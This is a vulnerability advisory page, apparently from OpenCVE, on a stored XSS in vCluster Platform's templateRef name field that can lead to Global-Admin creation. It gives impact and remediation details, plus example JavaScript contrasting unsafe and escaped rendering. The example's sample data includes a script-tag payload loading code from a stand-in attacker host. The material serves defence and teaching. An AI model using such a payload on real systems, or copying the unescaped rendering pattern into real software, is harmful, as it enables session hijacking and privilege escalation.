Description
vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0, there is a Stored XSS attack vulnerability via the name field of a templateRef. This can lead to the execution of arbitrary external scripts within the platform's browser context. In the worst case, a malicious user could potentially create a new Global-Admin user, bypassing other security restrictions. The attacker needs the ability to create namespaces. This vulnerability is fixed in 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0.
Published: 2026-05-14
Score: 9 Critical
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

vCluster Platform contains a stored cross-site scripting flaw (CWE-79) in the templateRef name field. A malicious user who can create namespaces can store a name containing script markup; when another user's browser renders that name, the script runs in that user's session with that user's privileges and can pull in further code from an external origin. In the worst case, when the page is viewed by a sufficiently privileged user, the injected code can create a new Global-Admin account, giving the attacker full administrative control over the platform and every virtual cluster it manages: a loss of confidentiality, integrity, and availability by way of privilege escalation.

Affected Systems

Affected products are Loft vCluster Platform releases before 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0, that is, every release on the 4.4, 4.5, 4.6 and 4.7 branches that predates the patched point release, plus all older versions. Upgrading to the patched release of the branch in use (or to 4.8.0) eliminates the flaw; note that a release newer than 4.4.3 on a later branch, such as 4.5.0, is still vulnerable.

Risk and Exploitability

The CVSS 3.1 score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) reflects a network-reachable flaw that needs only low privileges and changes scope, but it does require user interaction: a higher-privileged user has to open the page that renders the malicious templateRef name. The absence of an EPSS score or KEV listing means no exploitation data has been published yet, not that the flaw is unexploited. The precondition, the ability to create namespaces, is routinely granted to developers and collaborators in multi-tenant setups. Once it is met, the stored script runs with the privileges of whichever user views it, which is how an attacker can create a new Global-Admin user and take over the entire cluster management environment.

Generated by OpenCVE AI on May 14, 2026 at 16:23 UTC.

Remediation

The vendor description lists fixes in 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0; no separate advisory, patch link, or workaround is recorded on this page.

OpenCVE Recommended Actions

  • Upgrade Loft vCluster Platform to the patched release of the branch in use: 4.4.3, 4.5.5, 4.6.2, 4.7.1, or 4.8.0. Pick the fixed release for your branch rather than "anything above 4.4.3", since a version such as 4.5.0 is numerically later but still vulnerable.
  • If an immediate upgrade is not possible, restrict or revoke the permission to create namespaces for untrusted or guest accounts to reduce the attack surface.
  • Escaping the templateRef name at render time is the vendor-side fix and is not something an operator can apply to the shipped UI. Until the upgrade, review the templateRef names already stored in the cluster for HTML metacharacters (`<`, `>`, quotes, `&`); a legitimate reference never needs them, so treat any hit as attempted exploitation and investigate the creating user.
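As an added illustration (example code, not vCluster Platform's own code, whose rendering logic is not on this page), the JavaScript below shows the render-time mistake behind a stored XSS of this class next to its escaped counterpart, and adds a small audit helper for spotting stored templateRef names that carry HTML metacharacters. The object shape, the field path `templateRef.name`, the function names and the sample records are assumptions constructed for the example.

```javascript
// Added example, not vCluster Platform code: the class of bug behind a stored
// XSS in a "name" field, beside the escaped form, plus an audit helper.

// Escape the five characters that matter for HTML element content and for
// double- or single-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: an attacker-controlled field is interpolated into markup
// as-is. If the browser later assigns this string to innerHTML, any tag in the
// name is parsed and executed (a <script src=...> pulls in external code).
function renderTemplateRefUnsafe(templateRef) {
  return `<li class="template-ref">${templateRef.name}</li>`;
}

// Hardened pattern: the same template, but the value is escaped first, so the
// browser displays the literal text "<script ...>" instead of running it.
function renderTemplateRefSafe(templateRef) {
  return `<li class="template-ref">${escapeHtml(templateRef.name)}</li>`;
}

// Audit helper for an unpatched installation: given objects already stored in
// the cluster (shape assumed: {namespace, name, templateRef: {name}}), return
// "namespace/name" for every object whose templateRef.name contains an HTML
// metacharacter. A legitimate template reference never needs these characters,
// so any hit is worth treating as attempted exploitation.
function suspiciousTemplateRefs(objects) {
  return objects
    .filter((obj) => /[<>"'&]/.test((obj.templateRef && obj.templateRef.name) || ''))
    .map((obj) => `${obj.namespace}/${obj.name}`);
}

// Constructed sample input: two benign references and one carrying script
// markup. The hostname is a reserved example domain, not a real indicator.
const sampleObjects = [
  { namespace: 'team-a', name: 'vc-dev', templateRef: { name: 'default-template' } },
  { namespace: 'team-b', name: 'vc-qa', templateRef: { name: 'isolated-template' } },
  { namespace: 'team-c', name: 'vc-evil',
    templateRef: { name: '<script src="https://attacker.example/x.js"></script>' } },
];

// Demonstration when the file is run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  for (const obj of sampleObjects) {
    console.log('unsafe:', renderTemplateRefUnsafe(obj.templateRef));
    console.log('safe:  ', renderTemplateRefSafe(obj.templateRef));
  }
  console.log('flagged:', suspiciousTemplateRefs(sampleObjects));
}
```

escapeHtml covers element content and quoted attribute values only; a value that lands in a URL, a JavaScript string, or an unquoted attribute needs its own context-specific encoder. In a real UI the simplest fix is to never build markup from strings at all: assign user data through textContent or rely on the framework's default escaping.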



Advisories

No advisories yet.

History

Thu, 14 May 2026 16:45:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Loft-sh; Loft-sh loft
Vendors & Products                    Loft-sh; Loft-sh loft

Thu, 14 May 2026 15:15:00 +0000

Type          Values Removed   Values Added
Description                    vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0, there is a Stored XSS attack vulnerability via the name field of a templateRef. This can lead to the execution of arbitrary external scripts within the platform's browser context. In the worst case, a malicious user could potentially create a new Global-Admin user, bypassing other security restrictions. The attacker needs the ability to create namespaces. This vulnerability is fixed in 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0.
Title                          vCluster Platform: Stored XSS can lead to privilege escalation
Weaknesses                     CWE-79
References
Metrics                        cvssV3_1 {'score': 9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-14T14:48:05.096Z

Reserved: 2026-04-27T13:55:58.693Z

Link: CVE-2026-42457

Vulnrichment

No data.

NVD

Status : Deferred

Published: 2026-05-14T15:16:46.500

Modified: 2026-05-14T17:19:49.973

Link: CVE-2026-42457

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-14T16:30:24Z

Weaknesses